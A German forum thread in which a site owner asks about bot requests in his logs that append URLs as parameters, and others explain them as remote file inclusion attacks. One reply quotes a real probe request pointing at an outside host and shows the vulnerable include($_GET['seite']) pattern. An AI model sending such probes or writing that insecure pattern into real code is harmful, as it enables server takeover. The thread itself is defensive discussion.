Spam im Server-Log?

Hallo,

vor einiger Zeit hatte ich etwas sonderbare Einträge im Server-Log, und heute waren wieder welche drin:

Irgendein Bot ruft gezielt Seiten (HMTL und PHP) meiner Webseite auf und hängt als Parameter irgendwelche Webseitenadressen ran.

Meine Frage: Was soll das? Hofft man, auf ein so schwaches Script zu stoßen, das die angegebene Adresse in eine interaktive Linkliste oder in einen Forum-Thread aufnimmt? Oder zielt man auf Log-Leser ab? Das wäre ja noch bekloppter.

Was mich vor allem wundert ist, dass die zugehörigen IP-Adressen sowohl zu deutschen/europäischen, als auch zu US-Providern gehören. Technisch wundert mich das nicht, nur „inhaltlich“, wenn man da von Inhalt sprechen kann.

Vielleicht weiß ja jemand was über solche Machenschaften. Wäre da mal neugierig.

Danke und schönes Wochenende,
Kristian

Hallo,

vor einiger Zeit hatte ich etwas sonderbare Einträge im
Server-Log, und heute waren wieder welche drin:

Irgendein Bot ruft gezielt Seiten (HMTL und PHP) meiner
Webseite auf und hängt als Parameter irgendwelche
Webseitenadressen ran.

Jop, das habe ich damals auch mit Entrüsten und etwas Wut feststellen müssen. Heute waren 2 so Bots wieder drin:
/schaltungen.php?seite=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F&id=18
ach übrigens die angehängte Adresse, muss nicht unbedingt dem Angreifer seine URL sein, es handelt sich viel öfter um eine gehackte Seite (glaube ich).

Meine Frage: Was soll das? Hofft man, auf ein so schwaches
Script zu stoßen, das die angegebene Adresse in eine
interaktive Linkliste oder in einen Forum-Thread aufnimmt?

Was du jetzt meinst, kann ich leider nicht ganz verstehen, dennoch kann ich deine Frage beantworten. Zumindest was ich weiss:
Schwaches Skript = Ja!
und zwar wenn anfänger php programmieren, dann denken die (ich auch damals) man kann einfach per include(); eine beliebige Seite laden.
Wenn du in deinem Script sagst www.blabla.de/scripte.php?seite=javascript.html
sprich If($_GET[„seite“]==$_GET[„seite“])
{
include($_GET[„seite“]);
}
einfachstes Beispiel
Und schwup schon kann man fremde Scripte einschleusen, wenn das ganze dann noch per Root gemacht wurde und nicht ein Extrabenutzer für die HP erstellt wurde (unter Linux), hat der Angreifer praktisch einen neuen Server.
Bestes Beispiel: ich hab beim googlen mal auf eine Seite geklickt und zuerst wurde die auch ganz normal angezeigt, nach ein paar sekunden wurde ich aber auf eine Werbe-Porno-Seite umgeleitet…

Oder zielt man auf Log-Leser ab? Das wäre ja noch bekloppter.

das glaube ich nicht…

Was mich vor allem wundert ist, dass die zugehörigen
IP-Adressen sowohl zu deutschen/europäischen, als auch zu
US-Providern gehören. Technisch wundert mich das nicht, nur
„inhaltlich“, wenn man da von Inhalt sprechen kann.

Ja überall gibts schlechte Menschen :wink: Ich finds halt nur schade, dass Leute die etwas drauf haben, nötig haben kleine Leuts anzugreifen.

Vielleicht weiß ja jemand was über solche Machenschaften. Wäre
da mal neugierig.

Was du nicht weisst ist noch viel schlimmer: Ich hab davon gehört und selber nur ein paar mal in den logs gesehen (die guck ich nicht so oft an), andere viel bösere Angreifer probieren es gleich auf deinen Server mit root einzulogen oder machen brutforce auf deine www.seite.de/phpmyadmin und das ist um einiges schlimmer…

Übrigens schau dir an was ich mit den Angreifern erster Wahl (die mit Seite anhängen) mache.
Versuch mal an meine PHP-Dateien eine Internet-Adresse einzubinden, du wirst dich wundern :wink:

Danke und schönes Wochenende,
Kristian

Soviel zur meiner Version (es muss nicht alles stimmen)
Gruss
Paul

Hallo,

Irgendein Bot ruft gezielt Seiten (HMTL und PHP) meiner
Webseite auf und hängt als Parameter irgendwelche
Webseitenadressen ran.

Meine Frage: Was soll das? Hofft man, auf ein so schwaches
Script zu stoßen, das die angegebene Adresse in eine
interaktive Linkliste oder in einen Forum-Thread aufnimmt?

Nein, die zielen darauf ab, dass der PHP-Code, der in der referenzierten Datei steht ausgeführt wird, und sie damit den Server komprommittieren können. Das traurige ist, dass es so häufig funktioniert, dass es sich für die Spammer und Botnetzbetreiber lohnt.

Die kompromittierten Rechner können dann Spam verschicken und weitere Rechner automatisiert unter ihre Kontrolle bringen.

Was mich vor allem wundert ist, dass die zugehörigen
IP-Adressen sowohl zu deutschen/europäischen, als auch zu
US-Providern gehören.

Botnetze kennen keine Ländergrenzen.

Grüße,
Moritz

Interesting. Danke, Paul und Moritz. Es bestätigten sich ja z.T. meine Vermutungen. Aber da drängt sich mal wieder die Frage auf, ob es nicht auch Testseiten gibt, die die Sicherheit der eigenen Seiten testet (sowas wie W3C für HTML). Habe noch nie nach sowas gesucht, weil ich meine Seiten und Skripte mit der Hand schreibe und mir dabei genau überlege, was ich tue und wie ich mich selbst austricksen würde.

Links zu solchen Testern wären vielleicht im Brett oben drüber gut aufgehoben - also bitte dort antworten :wink: - „Empfehlenswerte Seiten“.

Kristian